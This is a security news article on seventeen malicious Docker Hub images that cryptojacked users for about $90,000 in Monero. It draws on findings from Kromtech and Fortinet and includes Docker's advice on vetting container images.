Malicious Docker Containers Earn Cryptomining Criminals $90K

Researchers said over a dozen malicious docker images available on Docker Hub allowed hackers to earn $90,000 in cryptojacking profits.


Seventeen malicious Docker containers earned cryptomining criminals $90,000 in 30 days in what could be a harbinger of things to come.

The figure may seem tame compared to some of the larger paydays that cryptojackers have earned. But, researchers at Kromtech Security Center warn containers are shaping up to be the next ripe target for these types of criminals.

Kromtech said the malicious Docker images (17 in total) were pulled down from the Docker Hub image repository. Researchers can’t say for sure how many times the rogue containers were used by Docker Hub users, but Kromtech estimates that the 17 images were downloaded collectively 5 million times during the year they were available.

All 17 were removed from Docker Hub on May 10 by Docker, after Fortinet found the containers and published a report on the images being used to mine cryptocurrency. Fortinet was able to tie the compromised containers back to one threat actor, thanks to a shared Monero wallet.

“By pushing malicious images to a Docker Hub registry and pulling it from the victim’s system, hackers were able to mine 544.74 Monero, which is equal to $90,000,” wrote Kromtech, in a Tuesday blog post building off previous findings both from Fortinet and Aqua Security, which in February detailed numerous ways that containers can be abused.

Kromtech’s report delved deeper into the malicious containers found by Fortinet and the larger Docker threat landscape. Of the 17 malicious containers, Kromtech said nine had the mining software pre-installed. The others were intentionally left misconfigured and available on Docker Hub, allowing the adversary access to the instances at a later date. Each of the images advertised themselves as tools for various popular software products such as Apache Tomcat, MySql and Cron.

“Today’s growing number of publicly accessible misconfigured orchestration platforms like Kubernetes allows hackers to create a fully automated tool that forces these platforms to mine Monero,” Kromtech researchers wrote. Kubernetes is a container orchestration system with tools that automate the deployment, updating and monitoring of containers.

Using public repositories to hide malicious content in plain sight is nothing new. Third-party code repositories such as GitHub, Bitbucket and NuGet Gallery are essential tools helping developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Similarly, Docker Hub offers developers time-saving functions. Both can be targeted by rogue developers.

“Comparing Docker Hub with GitHub isn’t an exact match,” Kromtech explained. “Hackers can hide malicious instructions in Dockerfile (where Docker commands are stored) from users.”

In an email response to a Threatpost request for comment, David Lawrence, head of security at Docker, wrote: 

“As with public repositories like GitHub, Docker Hub is there for the service of the community. When dealing with open public repositories and open source code, we recommend that you follow a few best practices including: know the content author, scan images before running and use curated official images in Docker Hub and certified content in Docker Store whenever possible.”

Kromtech said the increased attention by hackers to publicly accessible orchestration platforms such as Kubernetes began at the start of 2018, when attackers moved on from Amazon Elastic Compute Cloud exploits to container-specific exploits. Some of those attacks took advantage of hundreds of misconfigured Kubernetes administration consoles, researchers said. One high-profile attack targeted carmaker Tesla:

“The hackers had infiltrated Tesla’s Kubernetes console, which was not password protected. Within one Kubernetes pod, access credentials were exposed to Tesla’s AWS environment, which contained an Amazon S3 (Amazon Simple Storage Service) bucket that had sensitive data such as telemetry. In addition to the data exposure, hackers were performing crypto mining from within one of Tesla’s Kubernetes pods,” Kromtech said.

For Docker’s part, it does offer tools to its enterprise customers to mitigate against rough containers. Docker had previously offered security scanning for Docker Hub users, but shuttered the free offering in March. There are also numerous free Docker security and scanning tools to choose from.

“The process of pulling a Docker image has to be transparent and easy to follow. First, you can simply try to look through Dockerfile to find out what the FROM and ENTRYPOINT notations are and what the container does. Second, Docker images are built using the Docker automated builds. That’s because, with Docker automated builds, you get traceability between the source of the Dockerfile, the version of the image, and the actual build output,” Kromtech researchers said.

For other container projects, they said developers need to focus on similar container traceability in a bid to protect their cloud instances.

(This article was updated at 11:30 pm ET on 6/13 with a response from Docker)

Suggested articles